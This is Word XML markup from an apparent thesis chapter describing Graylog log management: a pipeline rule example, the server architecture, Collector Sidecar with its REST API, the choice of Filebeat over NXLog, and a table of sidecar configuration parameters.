      <w:r w:rsidRPr="009B04F7">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
        <w:t>cidr_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009B04F7">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>match(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009B04F7">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>“10.10.10.0/24”, to_ip($message.g12_remote_ip))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033002B" w:rsidRPr="009B04F7" w:rsidRDefault="0033002B" w:rsidP="009B04F7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B04F7">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009B04F7">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
        <w:t>then</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033002B" w:rsidRPr="009B04F7" w:rsidRDefault="0033002B" w:rsidP="009B04F7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B04F7">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009B04F7">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
        <w:t>end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033002B" w:rsidRDefault="0048196B" w:rsidP="0033002B">
      <w:r>
        <w:t>Simply written below the name of the rule is a word says “when” that is the opening of a Boolean expression for the condition underneath it. The next line is a phrase that performs the comparison for the rule, which we can consider as the heart of the rule. The first rule calls the function “has_field” and getting a string “src_ip”. The function will return true if there is a field named “src_ip” inside the message. In this comparison, rule “has firewall fields” wants the message</w:t>
      </w:r>
      <w:r w:rsidR="00845030">
        <w:t xml:space="preserve"> to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> contain both “src_ip” and “dst_ip” field. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C5BAA" w:rsidRDefault="008C5BAA" w:rsidP="0033002B">
      <w:r>
        <w:t xml:space="preserve">The second rule wants to check whether the network address 10.10.10.0 whose subnet mask is /24 matched the IP of the message that are process. The function “to_ip” convert the string that is the IP address which has been capture in the message. The phrase “$message” indicates the message that rule is working on, and the field “g12_remote_ip” is always included in the message by Graylog. The word “then” </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>defines the actions to be taken by rules. In this case, we do not specify any action since we just explain an example about the structure of rules.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00904D1E" w:rsidRDefault="0033002B" w:rsidP="0033002B">
      <w:r w:rsidRPr="00830CDC">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00904D1E" w:rsidRPr="00830CDC">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>For managing the log data</w:t>
      </w:r>
      <w:r w:rsidR="00904D1E">
        <w:t>, Graylog applies a working model as demonstrated in the figure below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00904D1E" w:rsidRDefault="00904D1E" w:rsidP="00904D1E">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52FF8F19" wp14:editId="31219969">
            <wp:extent cx="3410186" cy="3402418"/>
            <wp:effectExtent l="57150" t="57150" r="57150" b="64770"/>
            <wp:docPr id="3074" name="Picture 2" descr="../_images/architec_small_setup.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_images/architec_small_setup.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noGrp="1"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1188" cy="3413395"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:effectLst>
                      <a:outerShdw blurRad="50800" dir="14400000">
                        <a:srgbClr val="000000">
                          <a:alpha val="40000"/>
                        </a:srgbClr>
                      </a:outerShdw>
                    </a:effectLst>
                    <a:extLst/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00904D1E" w:rsidRPr="00EA77C6" w:rsidRDefault="00904D1E" w:rsidP="00904D1E">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc483834783"/>
      <w:bookmarkStart w:id="53" w:name="_Toc485303766"/>
      <w:r w:rsidRPr="00EA77C6">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2</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7</w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00EA77C6">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Graylog working model.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w:rsidR="00904D1E" w:rsidRPr="00EA77C6" w:rsidRDefault="00904D1E" w:rsidP="00904D1E">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA77C6">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> From: </w:t>
      </w:r>
      <w:hyperlink r:id="rId29" w:history="1">
        <w:r w:rsidRPr="00EA77C6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>http://docs.graylog.org/en/2.2/pages/architecture.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00904D1E" w:rsidRDefault="00904D1E" w:rsidP="00904D1E">
      <w:r>
        <w:t xml:space="preserve">A Graylog server is a </w:t>
      </w:r>
      <w:r w:rsidR="00C352B0">
        <w:t xml:space="preserve">system that runs separately. It has a server for collecting log, a MongoDB database for storing log data and Elasticsearch Server for processing and searching for log contents. Graylog’s clients install an agent for interacting and sending log to the server, and an administrator of the system can config and setup the server via a Web GUI that was built into the Graylog server. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C352B0" w:rsidRDefault="00C352B0" w:rsidP="00904D1E">
      <w:r>
        <w:t>First, we will get into the Graylog collector that is installed on the clients for collecting log. There are two collector program that Graylog supports for collecting and sending log, these are Graylog Collector Sidecar and Graylog Collector. Graylog Collector is the older version which has been developed since the beginning of Graylog. Now Graylog Collector</w:t>
      </w:r>
      <w:r w:rsidR="00830CDC">
        <w:t xml:space="preserve"> is deprecated and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> has been replaced by Graylog Collector Sidecar, which is smaller, runs smoother and more stable. In this thesis concept, we use Graylog Collector Sidecar for collecting log from distributed log collector hardware. </w:t>
      </w:r>
      <w:r w:rsidR="00830CDC">
        <w:t>We would like not to present Graylog Collector since it is not supported anymore, otherwise, we will analyze a little about Graylog Collector Sidecar for knowing its operation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00830CDC" w:rsidRDefault="00830CDC" w:rsidP="00904D1E">
      <w:r w:rsidRPr="00830CDC">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Graylog Collector Sidecar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is a lightweight configuration management system for different log collectors, also called Backend </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="741301367"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> CITATION Gra1 \l 1033 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(16)</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t xml:space="preserve">. While the Graylog server acts as a centralized log collector system, the Graylog Collector Sidecar runs on the client machine for collecting log. </w:t>
      </w:r>
      <w:r w:rsidR="008625D0">
        <w:t xml:space="preserve">Graylog Collector Sidecar can be configured to run as an OS service (on Windows) or a daemon (on Linux). In a graphical way, the figure below draws a correlation between Graylog server and Graylog Collector Sidecar. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008625D0" w:rsidRDefault="008625D0" w:rsidP="008625D0">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="408513B6" wp14:editId="77B15C3A">
            <wp:extent cx="5581650" cy="36696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3669665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="008625D0" w:rsidRPr="00EA77C6" w:rsidRDefault="008625D0" w:rsidP="00EF2B8A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc483834784"/>
      <w:bookmarkStart w:id="55" w:name="_Toc485303767"/>
      <w:r w:rsidRPr="00EA77C6">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2</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8</w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00EA77C6">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> The correlation between Graylog server and Graylog Collector Sidecar.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w:rsidR="008625D0" w:rsidRPr="00EA77C6" w:rsidRDefault="008625D0" w:rsidP="008625D0">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA77C6">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">From: </w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidRPr="00EA77C6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>http://docs.graylog.org/en/2.2/pages/collector_sidecar.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008625D0" w:rsidRDefault="00EF2B8A" w:rsidP="008625D0">
      <w:r>
        <w:t xml:space="preserve">Graylog Collector Sidecar receives the configuration from Graylog server through a “Rest API”. </w:t>
      </w:r>
      <w:r w:rsidR="009B04F7">
        <w:t xml:space="preserve">Graylog Rest API is a set of API that is used for a Graylog server to manage its client. A Graylog client managed by Rest API could be a collector or another Graylog server which is work in cluster mode with this current Graylog server. We will talk about Graylog cluster later in a small section. After Graylog Collector Side connect to Rest API, it and Graylog server will exchange configuration, if the configuration is correct, Graylog server will accept and connect with the agent via this API through the open port 9000, with the specific URL is: </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidR="009B04F7" w:rsidRPr="00C00948">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://&lt;Graylog_server_IP&gt;:9000/api/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="009B04F7">
        <w:t xml:space="preserve">. On the client side, Graylog Collector Sidecar is configured a method for sending log to the server, which we call a backend. The log backend can be NXLog or Winlogbeat (for Windows) and Filebeat (for Linux). </w:t>
      </w:r>
      <w:r w:rsidR="0031762B">
        <w:t xml:space="preserve">On the other side, Graylog server should be configure for supporting the appropriate backend that can work with the agent. In the concept of this thesis, we use Filebeat </w:t>
      </w:r>
      <w:r w:rsidR="0031762B">
        <w:lastRenderedPageBreak/>
        <w:t>for connecting the agent on our log hardware, since we configured it to run on Debian core Unix system, to the Graylog server. Therefore, to make this be straightforward, we would like to only explain the working concept of Filebeat comparing to NXLog, without discussing about Winlogbeat in any detail.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22AC8" w:rsidRDefault="0031762B" w:rsidP="00D22AC8">
      <w:r>
        <w:t xml:space="preserve">NXLog and Filebeat are two programs that are together working to create the opensource log management solutions. </w:t>
      </w:r>
      <w:r w:rsidR="00D22AC8">
        <w:t>They both aim to support for opensource, m</w:t>
      </w:r>
      <w:r w:rsidR="00A8226C">
        <w:t>ulti</w:t>
      </w:r>
      <w:r w:rsidR="00D22AC8">
        <w:t>platform, lightweight, speed</w:t>
      </w:r>
      <w:r w:rsidR="00495982">
        <w:t>, reliability</w:t>
      </w:r>
      <w:r w:rsidR="00D22AC8">
        <w:t xml:space="preserve"> and high availability, those are features that all administrators who want to implement a log distributed system </w:t>
      </w:r>
      <w:r w:rsidR="00A8226C">
        <w:t>must</w:t>
      </w:r>
      <w:r w:rsidR="00D22AC8">
        <w:t xml:space="preserve"> consider.</w:t>
      </w:r>
      <w:r w:rsidR="00A8226C">
        <w:t xml:space="preserve"> They also support many platforms presenting in any data center and information system. They both consider about the way they are deployed on the client’s machines, how message travels from the clients to any kind of log collector server that are commonly used. </w:t>
      </w:r>
      <w:r w:rsidR="00D22AC8">
        <w:t>But the</w:t>
      </w:r>
      <w:r w:rsidR="00A8226C">
        <w:t>re are two</w:t>
      </w:r>
      <w:r w:rsidR="00D22AC8">
        <w:t xml:space="preserve"> important difference</w:t>
      </w:r>
      <w:r w:rsidR="00A8226C">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00D22AC8">
        <w:t xml:space="preserve"> between them</w:t>
      </w:r>
      <w:r w:rsidR="00A8226C">
        <w:t xml:space="preserve"> that make us choose Filebeat instead of NXLog are the programing language they use to code and deploy their agent, and Filebeat is developed by Elastic.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A8226C" w:rsidRDefault="00A8226C" w:rsidP="00A8226C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">First, about the programming language, since we want to deploy a little server that handle hundreds of threat monitor agents in the network, we would like to choose a log agent which run as smooth as possible to deploy in that server. In this case, Filebeat is written in </w:t>
      </w:r>
      <w:r w:rsidR="00215BF8">
        <w:t xml:space="preserve">Beats platform which uses Golang as its mainly developing language while NXLog use C for developing its agent. Golang is a flexible, lightweight and powerful when handling multiple threads, which helps us greatly in managing hundreds of agents deployed in the network. We believe, from the practice that Golang run smoother and handling threads better than C without using too much system resources, Filebeat could be deployed and it can handle multiple concurrent tasks without consuming too much resource on our system. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00215BF8" w:rsidRDefault="00215BF8" w:rsidP="00A8226C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>The second reason for choosing Filebeat is that Filebeat are developed by Elastic, which is the company develops the Elasticsearch Graylog server is using for its operations in managing and searching log data. Therefore, Filebeat is built in to Graylog Collector Sidecare and our client d</w:t>
      </w:r>
      <w:r w:rsidR="003371FE">
        <w:t xml:space="preserve">o not need to install </w:t>
      </w:r>
      <w:r w:rsidR="00DD628B">
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidR="003371FE">
        <w:t xml:space="preserve">any third </w:t>
      </w:r>
      <w:r>
        <w:t>party software</w:t>
      </w:r>
      <w:r w:rsidR="00DD628B">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> while they want to protect their system. And for other</w:t>
      </w:r>
      <w:r w:rsidR="00845030">
        <w:t xml:space="preserve"> small</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> reason, we believe that just like Microsoft Office works perfectly in Microsoft Windows, Filebeat might works perfectly with Graylog system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD628B" w:rsidRDefault="00845030" w:rsidP="00A8226C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Graylog Collector Sidecar does not receive any configuration for which log files or directories for log collecting, but that configuration, and following by other configs that help, will be sent</w:t>
      </w:r>
      <w:r w:rsidR="003371FE">
        <w:t xml:space="preserve"> to the agent by Graylog server through Rest API. When recognizes there is any change to the log files specified, Graylog Collector Sidecar read the addon information by reading line to line, then sends that data to the Graylog server. Server process that data, then stores to its database for managing in the future.</w:t>
      </w:r>
      <w:r w:rsidR="00DD628B">
        <w:t xml:space="preserve"> Filebeat has a configuration file that store configures for connecting to the Graylog server.</w:t>
      </w:r>
      <w:r w:rsidR="003371FE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD628B" w:rsidRDefault="00DD628B" w:rsidP="00EA77C6">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>A Graylog Collector Sidecard configuration file might have the c</w:t>
      </w:r>
      <w:r w:rsidR="00EA77C6">
        <w:t xml:space="preserve">ontent show in </w:t>
      </w:r>
      <w:r>
        <w:t>the figure below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD628B" w:rsidRDefault="00DD628B" w:rsidP="00DD628B">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09032B18" wp14:editId="3E421DAD">
            <wp:extent cx="5581650" cy="3032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3032125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA77C6" w:rsidRDefault="00DD628B" w:rsidP="00EA77C6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_Toc483834785"/>
      <w:bookmarkStart w:id="57" w:name="_Toc485303768"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA77C6">
        <w:t>Example configuration of Graylog Collector Sidecar.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w:rsidR="00EA77C6" w:rsidRDefault="00EA77C6" w:rsidP="00EA77C6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From: </w:t>
      </w:r>
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r w:rsidRPr="00C00948">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://docs.graylog.org/en/2.2/pages/collector_sidecar.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00EA77C6" w:rsidRDefault="00DD628B" w:rsidP="00A8226C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>The format of configuration file is so simple. A config contains of 2 part</w:t>
      </w:r>
      <w:r w:rsidR="00CF077E">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: a parameter and its argument, they are separated by a </w:t>
      </w:r>
      <w:r w:rsidR="00EA77C6">
        <w:t>colon (“:”). The parameters those define the configurations can be explained in the table below.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2263"/>
        <w:gridCol w:w="6517"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EA77C6" w:rsidTr="00CF077E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRPr="00CF077E" w:rsidRDefault="00EA77C6" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6517" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRPr="00CF077E" w:rsidRDefault="00EA77C6" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA77C6" w:rsidTr="00EA77C6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00EA77C6" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00EA77C6">
              <w:t>server_url</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6517" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00CF077E">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:t>URL to the Graylog API, e.g. http://127.0.0.1:9000/api/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA77C6" w:rsidTr="00EA77C6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00EA77C6" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00EA77C6">
              <w:t>update_interval</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6517" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:t>The interval in seconds the sidecar will fetch new configurations from the Graylog server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA77C6" w:rsidTr="00EA77C6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00EA77C6" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00EA77C6">
              <w:t>tls_skip_verify</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6517" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:t>Ignore errors when the REST API was started with a self-signed certificate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA77C6" w:rsidTr="00EA77C6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00EA77C6" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00EA77C6">
              <w:t>send_status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6517" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:t>Send the status of each backend back to Graylog and display it on the status page for the host</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA77C6" w:rsidTr="00EA77C6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:t>list_log_files</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6517" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:t>Send a directory listing to Graylog and display it on the host status page, e.g. /var/log. This can also be a list of directories</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA77C6" w:rsidTr="00EA77C6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EA77C6" w:rsidRDefault="00CF077E" w:rsidP="00A8226C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00CF077E">
              <w:t>node_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6517" w:type="dxa"/>
          </w:tcPr>
